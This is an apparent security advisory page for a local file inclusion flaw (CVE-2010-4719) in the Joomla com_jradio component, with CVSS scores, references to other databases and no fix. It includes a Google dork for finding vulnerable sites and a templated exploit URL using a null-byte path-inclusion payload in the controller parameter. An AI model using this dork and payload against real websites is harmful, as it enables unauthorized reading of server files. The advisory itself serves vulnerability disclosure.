Ashiyane Digital Security Team

2011.02.03
Credit: Sid3^effects
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-4719
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#Name :Joomla com_jradio LFI Vulnerability #Date : Dec,16 2010 #Vendor Url :http://joomlacode.org/gf/project/componentjradio/ #Dork:inurl:com_jradio #Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> #Big hugs : Th3 RDX,Hanan_butt, #special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,SeeMe,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S! Te,n4pst3rr,tranquiller #greetz to :!Op3x_ninjato team,www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz ####################################################################################################### Description: JRadio is a powerful internet radio receiver for Joomla 1.5 based websites. ############################################################################################################### Exploit:LFI Vulnerability http://server/index.php?option=com_jradio&controller=[LFI]%00 ############################################################################################################### Fix: N/a ############################################################################################################### # 0day no more # Sid3^effects # 1337day.com

References:

http://xforce.iss.net/xforce/xfdb/64143
http://www.securityfocus.com/bid/45440
http://www.fxwebdesign.nl/index.php?option=com_content&view=article&id=20&Itemid=56
http://www.exploit-db.com/exploits/15749
http://secunia.com/advisories/42600
http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top